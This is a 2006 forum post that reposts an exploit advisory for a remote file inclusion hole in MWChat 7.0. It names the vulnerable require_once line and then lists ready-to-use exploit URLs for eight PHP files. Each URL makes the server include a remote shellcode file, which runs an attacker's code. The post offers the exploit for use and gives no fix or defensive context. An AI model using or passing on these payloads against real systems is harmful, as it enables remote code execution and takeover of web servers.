alexcargo Posted November 7, 2006 Report Posted November 7, 2006 Class = Remote File InclusionURL : http://www.appindex.net/products/download/?product=mwchat&version=7.0Found by = Mr.3FReeT ..################################################code in :.about.php , buddy.php , chat.php , dialog.php , head.php , help.php , index.php , license.php ..... nearly all require_once("$CONFIG[MWCHAT_Libs]/security.php");################################################Exploit:""""""""http://[target]/[path]/about.php?CONFIG[MWCHAT_Libs]=shellcode.txt?http://[target]/[path]/buddy.php?CONFIG[MWCHAT_Libs]=shellcode.txt?http://[target]/[path]/chat.php?CONFIG[MWCHAT_Libs]=shellcode.txt?http://[target]/[path]/dialog.php?CONFIG[MWCHAT_Libs]=shellcode.txt?http://[target]/[path]/head.php?CONFIG[MWCHAT_Libs]=shellcode.txt?http://[target]/[path]/help.php?CONFIG[MWCHAT_Libs]=shellcode.txt?http://[target]/[path]/index.php?CONFIG[MWCHAT_Libs]=shellcode.txt?http://[target]/[path]/license.php?CONFIG[MWCHAT_Libs]=shellcode.txt?################################################ Quote